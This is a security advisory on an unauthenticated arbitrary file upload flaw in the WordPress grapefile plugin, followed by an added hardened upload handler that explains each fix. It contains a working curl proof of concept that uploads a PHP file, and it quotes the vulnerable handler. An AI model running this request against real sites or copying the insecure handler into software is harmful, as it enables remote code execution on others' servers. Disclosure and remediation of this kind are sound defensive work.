Title: Wordpress grapefile plugin <= 1.1 Arbitrary file upload
Date: 30-8-2011
Author: Hrvoje Spoljar [ hrvoje.spoljar(at)gmail.com ]
Version: 1.1
Software link: http://wordpress.org/extend/plugins/grapefile/

PoC:

curl -F "userfile=@mycode.php" http://domain.tld/wp-content/plugins/grapefile/grapeupload.php

File(s):

grapeupload.php
grapeupload2.php
grapeupload3.php
grapeupload4.php

Vulnerable code:

// No authentication, nonce or file-type check precedes this block: any
// unauthenticated request that posts a multipart "userfile" field reaches it.
$uploaddir = $_SERVER["DOCUMENT_ROOT"].'/wp-content/plugins/grapefile/filestore/avi/';
// The client-supplied name (and therefore its extension) is used as-is; only the
// directory part is stripped, so a .php upload is written inside the web root.
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
    echo "success";
}
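The defects in the snippet above are the missing access control, the missing file-type validation and the reuse of the client-supplied file name inside the web root. The following hardened handler is an added example written for this page; it is not code from the grapefile plugin or its author. It assumes the handler is wired up as a WordPress admin-post action (the action name grapefile_upload and the nonce action grapefile_upload_nonce are assumptions), and that the web server is configured to deny PHP execution under the uploads directory.

```php
<?php
// Added example, not grapefile plugin code. Hardened replacement for the
// upload handler, registered as a WordPress admin-post action. The names
// 'grapefile_upload' and 'grapefile_upload_nonce' are assumptions.
add_action( 'admin_post_grapefile_upload', 'grapefile_secure_upload' );

function grapefile_secure_upload() {
    // 1. Require an authenticated user with the upload capability. The
    //    original script can be reached by anyone who knows its URL.
    if ( ! is_user_logged_in() || ! current_user_can( 'upload_files' ) ) {
        wp_die( 'Forbidden', '', array( 'response' => 403 ) );
    }

    // 2. Require a valid nonce so the upload cannot be triggered cross-site.
    check_admin_referer( 'grapefile_upload_nonce' );

    if ( empty( $_FILES['userfile'] ) || UPLOAD_ERR_OK !== $_FILES['userfile']['error'] ) {
        wp_die( 'No file uploaded', '', array( 'response' => 400 ) );
    }

    // 3. Only accept the type this directory is meant for. The extension is
    //    restricted to the allow-list, and where PHP's fileinfo extension is
    //    available WordPress cross-checks it against the sniffed content type.
    $allowed = array( 'avi' => 'video/x-msvideo' );
    $check   = wp_check_filetype_and_ext(
        $_FILES['userfile']['tmp_name'],
        $_FILES['userfile']['name'],
        $allowed
    );
    if ( empty( $check['ext'] ) || empty( $check['type'] ) ) {
        wp_die( 'Unsupported file type', '', array( 'response' => 415 ) );
    }

    // 4. Never reuse the client-supplied name. A random name plus the validated
    //    extension means a file posted as "mycode.php" can never land as .php.
    $newname = wp_generate_password( 16, false, false ) . '.' . $check['ext'];

    // 5. Store under the uploads tree rather than the plugin directory, and
    //    rely on a web-server rule that denies script execution there.
    $upload_dir = wp_upload_dir();
    $target_dir = trailingslashit( $upload_dir['basedir'] ) . 'grapefile/avi/';
    if ( ! wp_mkdir_p( $target_dir ) ) {
        wp_die( 'Storage unavailable', '', array( 'response' => 500 ) );
    }
    $target = $target_dir . $newname;

    if ( ! move_uploaded_file( $_FILES['userfile']['tmp_name'], $target ) ) {
        wp_die( 'Upload failed', '', array( 'response' => 500 ) );
    }
    // Clear any execute bit; the file only needs to be readable by the server.
    chmod( $target, 0644 );

    wp_safe_redirect( wp_get_referer() ? wp_get_referer() : admin_url() );
    exit;
}
```

Each of the five checks closes one of the gaps in the original script; the capability and nonce checks alone would already stop the unauthenticated PoC request, and the type allow-list plus server-generated file name remove the path to code execution even for a legitimately logged-in uploader. The web-server rule (for example a directory-level deny on .php handlers under wp-content/uploads) is defence in depth in case a later validation bug lets an unexpected file through.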